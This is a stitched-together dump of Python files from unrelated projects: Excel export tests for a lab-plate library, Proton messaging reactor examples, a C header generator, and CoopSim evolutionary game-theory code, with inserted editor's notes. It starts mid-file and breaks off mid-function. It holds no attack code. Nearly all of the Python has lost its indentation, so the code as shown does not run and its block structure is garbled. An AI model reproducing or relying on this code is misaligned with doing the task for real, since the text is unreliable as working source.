self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateStack_bpi(self):
read_excel = as_read_excel(
self.PTE, "representation", self.stacki, "test.xlsx", "plate_representation"
)
rm_empty = like_read_excel_stack(self.stacki)
self.assertEqual(read_excel, rm_empty)
def test_representation_BioPlateStack_bpi_hd(self):
c = {"header": False}
read_excel = as_read_excel(
self.PTE,
"representation",
self.stacki,
"test.xlsx",
"plate_representation",
conditions=c,
)
rm_empty = like_read_excel_stack(self.stacki, header=False)
self.assertEqual(read_excel, rm_empty)
###TEST DATA SHEET
def test_data_BioPlate(self):
c = None
read_excel = as_read_excel(
self.PTE, "data", self.plt, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data(self.plt)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlate_row(self):
c = {"order": "R"}
read_excel = as_read_excel(
self.PTE, "data", self.plt, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data(self.plt, order="R")
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateInserts(self):
c = None
read_excel = as_read_excel(
self.PTE, "data", self.Inserts, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data(self.Inserts)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateInserts_row(self):
c = {"order": "R"}
read_excel = as_read_excel(
self.PTE, "data", self.Inserts, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data(self.Inserts, order="R")
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateInserts_row_acc(self):
c = {"order": "R", "accumulate": False}
read_excel = as_read_excel(
self.PTE, "data", self.Inserts, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data(self.Inserts, order="R", accumulate=False)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bp(self):
c = None
read_excel = as_read_excel(
self.PTE, "data", self.stack, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stack)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bp_row(self):
c = {"order": "R"}
read_excel = as_read_excel(
self.PTE, "data", self.stack, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stack, order="R")
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bp_row_acc(self):
c = {"order": "R", "accumulate": False}
read_excel = as_read_excel(
self.PTE, "data", self.stack, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stack, order="R", accumulate=False)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bpi(self):
c = None
read_excel = as_read_excel(
self.PTE, "data", self.stacki, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stacki)
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bpi_row(self):
c = {"order": "R"}
read_excel = as_read_excel(
self.PTE, "data", self.stacki, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stacki, order="R")
self.assertEqual(read_excel, rm_empty)
def test_data_BioPlateStack_bpi_row_acc(self):
c = {"order": "R", "accumulate": False}
read_excel = as_read_excel(
self.PTE, "data", self.stacki, "test.xlsx", "plate_data", conditions=c
)
rm_empty = like_read_data_stack(self.stacki, order="R", accumulate=False)
self.assertEqual(read_excel, rm_empty)
###TEST COUNT SHEET
def test_count_BioPlate(self):
c = None
read_excel = as_read_excel(
self.PTE, "count", self.plt, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.plt)
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlate_emp(self):
c = {"empty": "vide"}
read_excel = as_read_excel(
self.PTE, "count", self.plt, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.plt, empty="vide")
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlateInserts(self):
c = None
read_excel = as_read_excel(
self.PTE, "count", self.Inserts, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.Inserts, Inserts=True)
self.assertEqual(read_excel, rm_empty)
    def test_count_BioPlateInserts_emp(self):
c = {"empty": "vide"}
read_excel = as_read_excel(
self.PTE, "count", self.Inserts, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.Inserts, empty="vide", Inserts=True)
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlateStack_bp(self):
c = None
read_excel = as_read_excel(
self.PTE, "count", self.stack, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.stack)
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlateStack_bp_em(self):
c = {"empty": "vide"}
read_excel = as_read_excel(
self.PTE, "count", self.stack, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.stack, empty="vide")
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlateStack_bpi(self):
c = None
read_excel = as_read_excel(
self.PTE, "count", self.stacki, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.stacki, Inserts=True)
self.assertEqual(read_excel, rm_empty)
def test_count_BioPlateStack_bpi_em(self):
c = {"empty": "vide"}
read_excel = as_read_excel(
self.PTE, "count", self.stacki, "test.xlsx", "plate_count", conditions=c
)
rm_empty = like_read_count(self.stacki, empty="vide", Inserts=True)
self.assertEqual(read_excel, rm_empty)
def test_error_init(self):
with self.assertRaises(ValueError):
BioPlateToExcel("test.xlsx", sheets = ["bob",], test=True)
with self.assertRaises(Exception):
BioPlateToExcel("test.xlsx", sheets = "bob")
def test_in_memory(self):
t = BioPlateToExcel("test.xlsx", test=True)
self.assertEqual(t.get_test(), b'')
x = BioPlateToExcel("test.xlsx")
self.assertEqual(x.get_test(), None)
if __name__ == "__main__":
unittest.main()
```
{
"source": "jeckersb/Proton",
"score": 4
}
#### File: python/reactor/count-randomly.py
```python
import time, random
from proton.reactor import Reactor
# Let's try to modify our counter example. In addition to counting to
# 10 in quarter second intervals, let's also print out a random number
# every half second. This is not a super easy thing to express in a
# purely sequential program, but not so difficult using events.
class Counter:
def __init__(self, limit):
self.limit = limit
self.count = 0
def on_timer_task(self, event):
self.count += 1
print self.count
if not self.done():
event.reactor.schedule(0.25, self)
# add a public API to check for doneness
def done(self):
return self.count >= self.limit
class Program:
def on_reactor_init(self, event):
self.start = time.time()
print "Hello, World!"
# Save the counter instance in an attribute so we can refer to
# it later.
self.counter = Counter(10)
event.reactor.schedule(0.25, self.counter)
# Now schedule another event with a different handler. Note
# that the timer tasks go to separate handlers, and they don't
# interfere with each other.
event.reactor.schedule(0.5, self)
def on_timer_task(self, event):
# keep on shouting until we are done counting
print "Yay, %s!" % random.randint(10, 100)
if not self.counter.done():
event.reactor.schedule(0.5, self)
def on_reactor_final(self, event):
print "Goodbye, World! (after %s long seconds)" % (time.time() - self.start)
# In hello-world.py we said the reactor exits when there are no more
# events to process. While this is true, it's not actually complete.
# The reactor exits when there are no more events to process and no
# possibility of future events arising. For that reason the reactor
# will keep running until there are no more scheduled events and then
# exit.
r = Reactor(Program())
r.run()
```
#### File: proton-c/src/protocol.h.py
```python
from protocol import *
print "/* generated */"
print "#ifndef _PROTON_PROTOCOL_H"
print "#define _PROTON_PROTOCOL_H 1"
print
print "#include \"proton/type_compat.h\""
fields = {}
for type in TYPES:
fidx = 0
for f in type.query["field"]:
print "#define %s_%s (%s)" % (field_kw(type), field_kw(f), fidx)
fidx += 1
idx = 0
for type in TYPES:
desc = type["descriptor"]
name = type["@name"].upper().replace("-", "_")
print "#define %s_SYM (\"%s\")" % (name, desc["@name"])
hi, lo = [int(x, 0) for x in desc["@code"].split(":")]
code = (hi << 32) + lo
print "#define %s ((uint64_t) %s)" % (name, code)
fields[code] = (type["@name"], [f["@name"] for f in type.query["field"]])
idx += 1
print """
#include <stddef.h>
typedef struct {
const unsigned char name_index;
const unsigned char first_field_index;
const unsigned char field_count;
} pn_fields_t;
extern const pn_fields_t FIELDS[];
extern const char * const FIELD_STRINGPOOL;
extern const uint16_t FIELD_NAME[];
extern const uint16_t FIELD_FIELDS[];
extern const unsigned char FIELD_MIN;
extern const unsigned char FIELD_MAX;
"""
print "#ifdef DEFINE_FIELDS"
print 'struct FIELD_STRINGS {'
print ' const char FIELD_STRINGS_NULL[sizeof("")];'
strings = set()
for name, fnames in fields.values():
strings.add(name)
strings.update(fnames)
for str in strings:
istr = str.replace("-", "_");
print ' const char FIELD_STRINGS_%s[sizeof("%s")];' % (istr, str)
print "};"
print
print 'const struct FIELD_STRINGS FIELD_STRINGS = {'
print ' "",'
for str in strings:
print ' "%s",'% str
print "};"
print 'const char * const FIELD_STRINGPOOL = (const char * const) &FIELD_STRINGS;'
print
print "/* This is an array of offsets into FIELD_STRINGPOOL */"
print "const uint16_t FIELD_NAME[] = {"
print " offsetof(struct FIELD_STRINGS, FIELD_STRINGS_NULL),"
index = 1
for i in range(256):
if i in fields:
name, fnames = fields[i]
iname = name.replace("-", "_");
print ' offsetof(struct FIELD_STRINGS, FIELD_STRINGS_%s), /* %d */' % (iname, index)
index += 1
print "};"
print "/* This is an array of offsets into FIELD_STRINGPOOL */"
print "const uint16_t FIELD_FIELDS[] = {"
print " offsetof(struct FIELD_STRINGS, FIELD_STRINGS_NULL),"
index = 1
for i in range(256):
if i in fields:
name, fnames = fields[i]
if fnames:
for f in fnames:
ifname = f.replace("-", "_");
print ' offsetof(struct FIELD_STRINGS, FIELD_STRINGS_%s), /* %d (%s) */' % (ifname, index, name)
index += 1
print "};"
print "const pn_fields_t FIELDS[] = {"
name_count = 1
field_count = 1
field_min = 256
field_max = 0
for i in range(256):
if i in fields:
if i>field_max: field_max = i
if i<field_min: field_min = i
for i in range(field_min, field_max+1):
if i in fields:
name, fnames = fields[i]
if fnames:
print ' {%d, %d, %d}, /* %d (%s) */' % (name_count, field_count, len(fnames), i, name)
field_count += len(fnames)
else:
print ' {%d, 0, 0}, /* %d (%s) */' % (name_count, i, name)
name_count += 1
if i>field_max: field_max = i
if i<field_min: field_min = i
else:
print ' {0, 0, 0}, /* %d */' % i
print "};"
print
print 'const unsigned char FIELD_MIN = %d;' % field_min
print 'const unsigned char FIELD_MAX = %d;' % field_max
print
print "#endif"
print
print "#endif /* protocol.h */"
```
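The generated header stores every AMQP name in one struct-backed string pool and refers to entries by 16-bit offsets rather than pointers. A minimal Python sketch of that idea, with illustrative names rather than the real AMQP list:
```python
# Build one NUL-separated pool and record each name's byte offset; the
# offsets play the role of offsetof(struct FIELD_STRINGS, FIELD_STRINGS_x).
names = ["", "open", "begin", "attach"]  # illustrative only
pool = ""
offsets = {}
for name in names:
    offsets[name] = len(pool)
    pool += name + "\0"  # NUL-terminated, like the sizeof("...") char slots

def lookup(offset):
    # Equivalent of reading FIELD_STRINGPOOL + FIELD_NAME[i] in the C code.
    return pool[offset:pool.index("\0", offset)]

assert lookup(offsets["begin"]) == "begin"
```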
{
"source": "jecki/CoopSim",
"score": 3
}
#### File: jecki/CoopSim/Customized.py
```python
## Modules Simulation and Strategies must be imported here in order to
## define user strategies and/or custom simulation setups.
from Simulation import *
from Strategies import *
from PyPlotter import Simplex
from Bayreuth import *
### The following flags from CoopSim can be overridden here:
##
DISABLE_USER_STRATEGIES = False # if True, user defined strategies are not allowed
SIMPLEX_FLAVOR = Simplex.VECTORS # alternative: Simplex.TRAJECTORIES
## Here is an example for a user strategy.
## Don't forget to instantiate any user defined classes !!!
# class LesserTFT(Strategy):
# "Retailiate only when not having retailiated in the last round already."
# def firstMove(self):
# return 1 # start friendly
# def nextMove(self, myMoves, opMoves):
# if opMoves[-1] == 0 and myMoves[-1] != 0:
#             return 0 # retaliate
# else:
# return 1 # cooperate
# lesser_tft = LesserTFT()
## If your strategy uses random numbers, be sure to set the member
## variable 'randomizing' to true to indicate the use of random
## numbers, so that several samples of each match against this
## strategy are taken. The constructor of your strategy class
## that uses random numbers could look like this:
##
## class RandomizingStrategy(Strategy):
## def __init__(self):
## Strategy.__init__(self) # call the constructor of the parent class
## self.randomizing = True # indicate use of random numbers
##
## ...
##
## To define a custom setup, you will have to instantiate the SimSetup
## class and possibly also the Degenerator class (if you want to artificially
## induce an evolutionary drift for example). The constructor of the SimSetup
## class takes the following keyword parameters:
##
## name = string: name of the model
## strategyList = list of Strategy objects: the list of the strategies
## population = tuple: population share for each strategy
## correlation = float [0.0-1.0]: correlation factor
## gameNoise = float [0.0-1.0]: in game noise
## noise = float [0.0-1.0]: evolutionary background noise
## iterations = int: number of iterations for one match
## samples = int: number of sample matches to take (only useful for
## randomizing strategies)
## payoff = tuple of floats: payoff tuple (T, R, P, S)
## mutators = list of Mutator objects: description of possible
## mutations (or rather degenerations) of strategies during
## the course of the evolutionary development.
##
## The class Mutator is instantiated with the following parameters:
##
## original = int: the ordinal number of the strategy that is going
## to mutate
## mutated = int: the ordinal number of the strategy that 'original' is
## going to mutate into
## rate = float [0.0 - 1.0]: mutation rate
##
## Here is an example simulation setup using mutators:
# custom_setup = SimSetup(name = "Grim => Dove, Tester",
# strategyList = [Grim(), Dove(), Tester()],
# population = (0.8, 0.01, 0.19),
# mutators = [Mutator(0, 1, 0.01)])
def main(simwindow):
"""Customized.main will be calld right after initializing the
CoopSim main application window. (Use with care!!!)"""
pass
def filterStrategies(sl):
"""Filters the set of available strategies."""
return sl
def filterModels(md):
"""Filters the set of available modles."""
return md
##def filterStrategies(sl):
## """Only two state automata strategies."""
## # example: only two state automata and user defined strategies!
##  fl = [s for s in sl if s.__class__.__module__ == "UserStrategies" \
##          and not s.__class__ == TwoStateAutomaton]
## fl.extend(genAllAutomata())
## return fl
##
##def filterModels(md):
## """Only one model with all two state automata."""
## for k in md:
## if md[k].__class__.__module__ != "UserStrategies": del md[k]
## am = SimSetup("All Automata", genAllAutomata())
## am._userDefined = False
## md[am.name] = am
## return md
#automata = genAllAutomata()
#endGameCheaters = genEndGameCheaters(0, 10)
#
#automata_setup = SimSetup(name = "01 Automata",
# strategyList = automata)
#
#endgamecheaters_setup = SimSetup(name = "02 Endgame Cheaters",
# strategyList = endGameCheaters)
#
#noisycheaters_setup = SimSetup(name = "03 Noisy Endgame Cheaters",
# strategyList = endGameCheaters,
# gameNoise = 0.01)
#
#stability1 = SimSetup(name = "04 Grim, Tester",
# strategyList = [Grim(), Tester()],
# population = (0.8, 0.2))
#
#stability2 = SimSetup(name = "05 Grim => Dove, Tester => Dove",
# strategyList = [Grim(), Dove(), Tester()],
# population = (0.795, 0.01, 0.195),
# mutators = [Mutator(0, 1, 0.01), Mutator(2, 1, 0.01)])
#
#slipstream = SimSetup(name = "06 Slip Stream Altruism",
# strategyList = [TitForTat(), TatForTit(), Dove(), Hawk()],
# payoff = (5.0, 4.0, 1.0, 0.0))
#
#bayreuth = SimSetup(name = "07 Bayreuth Strategies",
# strategyList = [BayAnikaDoerge(), BayChristophSiemroth(),
# BayBernhardHannenheim2(), BayStefanFrisch(),
# BayJuliaLohmann(), BayPhilippSchaechtele2(),
# BayAugmentedTFT(), BayJohannesWerner(),
# BayMartinSchymalla(), BaySteffenHahn()])
#
#group_selection = SimSetup(name = "08 Group Selection RS 5",
# strategyList = [Dove(), Hawk()],
# payoff = (5.0, 4.0, 1.0, 0.0),
# demes = DemeDescriptor(num = 25,
# minSize = 2,
# maxSize = 2,
# reshapeInterval = 5))
#
#group_selection3 = SimSetup(name = "09 Group Selection RS 10",
# strategyList = [Dove(), Hawk()],
# payoff = (5.0, 4.0, 1.0, 0.0),
# demes = DemeDescriptor(num = 25,
# minSize = 2,
# maxSize = 2,
# reshapeInterval = 10))
#
#group_selection4 = SimSetup(name = "10 Group Selection More Strategies",
# strategyList = [Dove(), Grim(), SignalingCheater(), TitForTat()],
# payoff = (5.9, 3.0, 1.0, 0.0),
# demes = DemeDescriptor(num = 10,
# minSize = 1,
# maxSize = 3,
# reshapeInterval = 10))
```
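The keyword interface documented in the comments above, condensed into one live example; the strategy mix and rates mirror the commented `stability2` setup in the file, and `SimSetup`/`Mutator` are assumed to come from the star-imported `Simulation` module.
```python
from Simulation import *   # provides SimSetup, Mutator (as in Customized.py)
from Strategies import *   # provides Grim, Dove, Tester

# Grim and Tester both degenerate into Dove at a 1% rate per generation.
drift_setup = SimSetup(name = "Drift: Grim => Dove, Tester => Dove",
                       strategyList = [Grim(), Dove(), Tester()],
                       population = (0.795, 0.01, 0.195),
                       mutators = [Mutator(0, 1, 0.01), Mutator(2, 1, 0.01)])
```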
#### File: jecki/CoopSim/GroupSelection_test.py
```python
import gtk
from gtk import gdk
from PyPlotter import gtkGfx, gtkSupport, psGfx
import GroupSelection
from GroupSelection import *
########################################################################
#
# Strategy sets
#
########################################################################
strategy_mix = (Tester(), TitForTat(), Pavlov(), Grim(), Random(),
Hawk(), Tranquillizer(), Dove(), Joss())
automata = tuple(genAllAutomata())
TFTs = tuple(genParameterizedTFTs(0.0, 1.0, 0.2, 0.0, 1.0, 0.2))
dove_hawk = (Dove(), Hawk())
########################################################################
#
# Simulation class
#
########################################################################
class GroupSimulation(object):
def __init__(self, strategies, N, minSize, maxSize, reshapeInterval=10):
self.reshapeInterval = reshapeInterval
self.strategies = strategies
self.N = N; self.minSize = minSize; self.maxSize = maxSize
superdeme = PDDeme(self.strategies).spawn(N, minSize, maxSize)
superdeme.name = "Aggregation"
# groupdeme = PDDeme(self.strategies).spawn(N, minSize, maxSize)
groupdeme = copy.deepcopy(superdeme)
groupdeme.name = "Group Selection"
self.worlds = [None]*3; self.views = [None]*4
self.worlds[1] = superdeme
self.worlds[0] = self.worlds[1].aggregate()
self.worlds[0].name = "No Demes"
self.worlds[2] = groupdeme
self.views[0] = DemeView(self.worlds[0], Gfx.nilDriver(),
"No Demes")
self.views[1] = DemeView(self.worlds[1], Gfx.nilDriver(),
"Simple Aggregation", weighted = False)
self.views[2] = DemeView(self.worlds[1], Gfx.nilDriver(),
"Weighted Aggregation", weighted = True)
self.views[3] = DemeView(self.worlds[2], Gfx.nilDriver(),
"Group Selection", weighted = True)
self.win = gtkSupport.NotebookWindow([v.title for v in self.views],
(800,600),
"Cooperation & Group Selection")
for v in self.views: self.win.addRedrawHook(v.title, v.redraw)
for cv in self.win.pages.values():
cv.canvas.connect("button-press-event", self.onMouseButton)
cv.canvas.set_events(gdk.EXPOSURE_MASK|gdk.BUTTON_PRESS_MASK)
self.win.show()
def evolution(self, generations=100):
for i in xrange(generations):
if i > 0 and i % self.reshapeInterval == 0:
self.worlds[2].reshape(self.N, self.minSize, self.maxSize)
for k in xrange(len(self.worlds)): self.worlds[k].replicate()
for k in xrange(len(self.views)): self.views[k].update()
def onMouseButton(self, widget, event):
if event.button == 2 or event.button == 3:
dialog = gtk.FileChooserDialog(action = gtk.FILE_CHOOSER_ACTION_SAVE,
buttons = ("Save", gtk.RESPONSE_OK,
"Cancel", gtk.RESPONSE_CANCEL))
fltr = gtk.FileFilter()
fltr.add_pattern("*.eps")
fltr.set_name("EPS-Grafik")
dialog.add_filter(fltr)
if dialog.run() == gtk.RESPONSE_OK:
fname = dialog.get_filename()
if not fname.endswith(".eps"): fname += ".eps"
label = self.win.get_currentPage()
for view in self.views:
if view.title == label: break
else: raise AssertionError, "No page with label %s"%label
ps = psGfx.Driver()
view.redraw(ps)
ps.save(fname)
dialog.hide()
dialog.destroy()
## dialog = gtk.FileChooserDialog(action = gtk.FILE_CHOOSER_ACTION_SAVE,
## buttons = ("Save", gtk.RESPONSE_OK,
## "Cancel", gtk.RESPONSE_CANCEL))
## fltr = gtk.FileFilter()
## fltr.add_pattern("*.png")
## fltr.set_name("PNG-Grafik")
## dialog.add_filter(fltr)
## if dialog.run() == gtk.RESPONSE_OK:
## fname = dialog.get_filename()
## if not fname.endswith(".png"): fname += ".png"
## self.win.savePage(name = fname)
## dialog.hide()
## dialog.destroy()
########################################################################
#
# Test
#
########################################################################
def printRankings(sim):
for rank, name, share in sim.worlds[0].aggregate().ranking():
print "%2i. %s %1.5f"%(rank, name.ljust(40), share)
print "\n"+"-"*40+"\n"
for rank, name, share in sim.worlds[1].aggregate(False).ranking():
print "%2i. %s %1.5f"%(rank, name.ljust(40), share)
print "\n"+"-"*40+"\n"
for rank, name, share in sim.worlds[1].aggregate(True).ranking():
print "%2i. %s %1.5f"%(rank, name.ljust(40), share)
print "\n"+"-"*40+"\n"
for rank, name, share in sim.worlds[2].aggregate(True).ranking():
print "%2i. %s %1.5f"%(rank, name.ljust(40), share)
def Test1():
sim = GroupSimulation(automata, 100, 3, 7)
sim.evolution()
printRankings(sim)
sim.win.waitUntilClosed()
def Test2():
sim = GroupSimulation(dove_hawk, 25, 1, 2)
sim.evolution()
sim.win.waitUntilClosed()
def Test3():
sim = GroupSimulation(dove_hawk, 25, 2, 2)
sim.evolution(200)
sim.win.waitUntilClosed()
def Test4():
sim = GroupSimulation(strategy_mix, 100, 3,7)
sim.evolution()
printRankings(sim)
sim.win.waitUntilClosed()
def Test5():
sim = GroupSimulation(TFTs, 100, 3, 7)
sim.evolution()
printRankings(sim)
sim.win.waitUntilClosed()
def Test6():
sim = GroupSimulation((Tester(), Dove()), 25, 2, 2)
sim.evolution()
sim.win.waitUntilClosed()
def Test7():
GroupSelection.PD_PAYOFF = array([[[1.0, 1.0], [5.9, 0.0]],\
[[0.0, 5.9], [3.0, 3.0]]])
sim = GroupSimulation((SignallingCheater(), Dove(), Grim(), TitForTat()), 10, 1, 3)
sim.evolution(300)
sim.win.waitUntilClosed()
def Test8():
GroupSelection.PD_PAYOFF = array([[[1.0, 1.0], [5.9, 0.0]],\
[[0.0, 5.9], [3.0, 3.0]]])
sim = GroupSimulation((SignallingCheater(), Dove(), Grim(), TitForTat()), 10, 2, 3)
sim.evolution(300)
sim.win.waitUntilClosed()
if __name__ == "__main__":
# Test1()
# Test2()
Test3()
# Test4()
# Test5()
# Test6()
Test7()
# Test8()
```
#### File: CoopSim/PopulationDynamics/ArrayWrapper.py
```python
import copy, random
from Compatibility import *
class array(object):
"""Wraps a function or a nested list or tuple as a multidimensional array
Access to a cell of an ArrayWrapper object, e.g. "aw[a,b,c]" will be
mapped to a function call "f(a,b,c)" or to a nested sequence "l[a][b][c]"
respectively.
The ArrayWrapper class is syntactical sugar to provide similar access to
    payoff functions or lists as to Numeric or numarray arrays.
Warning: This wrapper does not do much error checking! Some methods
do not work for wrapped functions!
"""
def __str__(self):
if self.obj != None: return str(self.obj)
else: return "Cannot convert wrapped function to string!"
def __len__(self):
assert self.obj != None, "Length of wrapped function is not defined!"
return len(self.obj)
def __init__(self, obj, *etc):
"""obj - function or tuple of list
"""
if callable(obj):
self.obj = None
self.dimensions = None
self.function = obj
elif hasattr(obj, "__getitem__"):
self.obj = list(obj)
self.dimensions = []
l = self.obj
while type(l) == type([]):
self.dimensions.append(len(l))
assert l != [], "Empty lists or lists with empty lists "+\
"as elements cannot be wrapped!"
## for i in xrange(len(l)):
## if isinstance(l[i], array): l[i] = list(l[i])
l = l[0]
self.function = self.__listwrapper
else:
raise TypeError, "ArrayWrapper only supports callables, lists "+\
"or tuples, but not %s!" % type(obj)
self.__op = None
def __listwrapper(self, *key):
value = self.obj
for i in key: value = value[i]
return value
def __getitem__(self, key):
if type(key) == type(1): return self.function(key)
else: return self.function(*key)
def __setitem__(self, key, value):
if self.obj != None:
if type(key) == type(1):
self.obj[key] = value
else:
ref = self.obj
for i in key[:-1]: ref = ref[i]
ref[key[-1]] = value
else:
raise TypeError,"wrapped functions do not support item assignement"
def __getstate__(self):
if self.function != self.__listwrapper:
raise TypeError, "Can't prepare an Array Wrapper "\
"of a function for pickling!"
else:
dct = self.__dict__.copy()
dct["function"] = None
return dct
def __setstate__(self, dict):
self.__dict__.update(dict)
self.function = self.__listwrapper
def __operation(self, l1, l2):
if type(l1) == type([]):
if type(l2) == type([]):
return [self.__operation(x1,x2) for (x1,x2) in zip(l1,l2)]
else:
return [self.__operation(x,l2) for x in l1]
else: return self.__op(l1,l2)
def __arithmetic(self, other, op):
self.__op = op
if isinstance(other, array):
assert self.dimensions != None and other.dimensions != None,\
"Cannot multiply wrapped functions!"
assert self.dimensions == other.dimensions, \
"Cannot multiply arrays with different dimensions: %s and %s"\
% (str(self.dimensions),str(other.dimensions))
return array(self.__operation(self.obj, other.obj))
else: return array(self.__operation(self.obj, other))
def __mul__(self, other):
"""Multiply array item for item with another array of the same
dimensions or with a scalar. This is not a matrix multiplication.
For matrix multiplication use function 'matrixmultiply' or
'dot' instead.
"""
return self.__arithmetic(other, lambda x,y:x*y)
def __add__(self, other):
"""Add array item for item with another array of the same
dimensions or add a scalar to every element of the array.
"""
return self.__arithmetic(other, lambda x,y:x+y)
def __div__(self, other):
"""Divide an array elementwise by a scalar or by the elements
of another array.
"""
return self.__arithmetic(other, lambda x,y:x/y)
__truediv__ = __div__
def __eq__(self, other):
"""Elementwise test for equality."""
if other == None: return False
return self.__arithmetic(other, lambda x,y:x==y)
def __ne__(self, other):
"""Elementwise test for equality."""
if other == None: return True
return self.__arithmetic(other, lambda x,y:x!=y)
def tolist(self):
"""Returns the object as list. Not possible for wrapped functions!"""
if self.obj != None:
return self.obj
else: raise TypeError, "Cannot convert wrapped function into a list!"
def copy(self):
"""Returns a copy of the array."""
return copy.deepcopy(self)
def diagonal(self):
"""Returns the diagonal of the array as array"""
assert self.dimensions != None, \
"Cannot determine the diagonal for wrapped functions!"
ds = len(self.dimensions)
if ds == 1: return self.obj[0]
        # __getitem__ takes a single key, so the index tuple must not be unpacked
        return array([self.__getitem__((i,) * ds)
                      for i in xrange(len(self.obj))])
def asarray(seq):
"""Subsitute for Numeric.asarray."""
return array(seq)
def dot(a, b):
"""Matrix multiplication of the arrays 'a' and 'b'"""
assert a.dimensions != None and b.dimensions != None,\
"Cannot multiply wrapped functions!"
assert len(a.dimensions) <= 2 and len(b.dimensions) <= 2,\
"Sorry, implementation does not support dot product for dimensions > 2"
if len(a.dimensions) == 2:
if len(b.dimensions) == 1:
v = []
for l in range(a.dimensions[0]):
s = sum([a[l,c] * b[c] for c in range(a.dimensions[1])])
v.append(s)
return array(v)
elif len(a.dimensions) == 1:
if len(b.dimensions) == 1:
return sum([a[c]*b[c] for c in range(a.dimensions[0])])
assert False, "Sorry, matrix multiplication not yet implemented for "+\
"dimensions %i, %i"%(len(a.dimensions),len(b.dimensions))
matrixmultiply = dot
def flatten(l):
"""Flatten a nested list to a one dimensional list."""
r = []
for item in l:
if isinstance(item, list) or isinstance(item, tuple):
r.extend(flatten(item))
else: r.append(item)
return r
def ravel(array):
"""Rough replacement for Numeric.ravel!"""
assert array.obj != None, "Cannot reshape function arrays!"
return flatten(array.obj)
def concatenate(a, axis=0):
"""Rough replacement for Numeric.concatenate! Works only for 1-dimensional
array. The axis parameter is ignoered!"""
l = []
for aw in a: l.extend(aw.obj)
return array(l)
def diagonal(a, *parms):
"""Rough replacement for Numeric.diagonal."""
return a.diagonal()
def _zeros(shape):
"""Returns a list filled with zeros (floating point numbers)."""
if len(shape) == 0: return 0.0
else:
l = [_zeros(shape[:-1]) for i in xrange(shape[-1])]
return l
def zeros(shape, typeString="d"):
"""Returns an array filled with 0.0"""
return array(_zeros(shape))
def any(a):
"""--> true, if any of the elements of array 'a' are true."""
for e in flatten(a.obj):
if e: return True
return False
def all(a):
"""--> true, if all elements of array 'a' are true."""
for e in flatten(a.obj):
        if not e: return False
    return True
##def uniform(minimum, maximum, shape=[]):
## """Rough replacement for RandomArray.uniform."""
## if len(shape) == 0: return random.uniform(minimum, maximum)
## assert len(shape) <= 1, "Multidimensional random arrays not yet supported!"
## return array([random.uniform(minumum, maximum) for i in range(shape[0])])
```
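Editor's note: a minimal usage sketch of the wrapper above, not part of the original CoopSim sources. It assumes the module is importable as `ArrayWrapper` and only exercises behaviour visible in the listing.
```python
# Illustrative only -- exercises the array wrapper shown above.
from ArrayWrapper import array, dot

a = array([[1, 2], [3, 4]])      # wrap a nested list
f = array(lambda i, j: i + j)    # wrap a function of two indices

assert a[1, 0] == 3              # maps to obj[1][0]
assert f[1, 2] == 3              # maps to the call f(1, 2)
assert (a + 10)[0, 0] == 11      # elementwise scalar arithmetic

v = dot(a, array([1, 1]))        # matrix-vector product
assert v[0] == 3 and v[1] == 7
```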
#### File: CoopSim/PopulationDynamics/Example2.py
```python
try:
from PyPlotter import awtGfx as GfxDriver
except ImportError:
from PyPlotter import wxGfx as GfxDriver
from PyPlotter import Simplex
import Dynamics
from Compatibility import array
payoff_table = array([[1./3, 1./3, 1./3],
[2./3, 0., 0.],
[1./2, 0., 1./2]])
def DemandGame():
"""A population dynamical simulation of the demand game,
demonstrating the use of simplex diagrams.
"""
# Open a window for graphics output.
gfx = GfxDriver.Window(title="Demand Game")
# Generate the appropriate dynamical function from the payoff table.
dynamicsFunction = Dynamics.GenDynamicsFunction(payoff_table, e=0.0)
# Set up a simplex diagram of patches with a density of 51.
diagram = Simplex.Diagram(gfx, dynamicsFunction, "Demand Game",
"Demand 1/3", "Demand 2/3", "Demand 1/2",
styleFlags = Simplex.PATCHES, density = 51)
# Calculate 20 generations and show the updated colours of the
# patches after each generation.
diagram.show(0)
gfx.refresh()
for i in range(20):
diagram.show(1)
gfx.refresh()
# Finally, make the candidates for fixed points visible.
diagram.showFixedPoints((1.0, 0.5, 0.0))
gfx.refresh()
# Wait until the application window is closed by the user.
gfx.waitUntilClosed()
if __name__ == "__main__":
print __doc__
DemandGame()
```
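Editor's note: `Dynamics.GenDynamicsFunction` is not included in this dump. As a rough, hedged approximation of what the simplex animation computes, the sketch below applies the standard discrete replicator update to the same payoff table; the real module may well differ (for instance in how it uses the correlation parameter `e`).
```python
# Hedged sketch: standard discrete replicator dynamics for the demand game.
# x_i <- x_i * (A x)_i / (x . A x); assumed, not taken from GenDynamicsFunction.
def replicator_step(x, payoff):
    fitness = [sum(payoff[i][j] * x[j] for j in range(len(x)))
               for i in range(len(x))]
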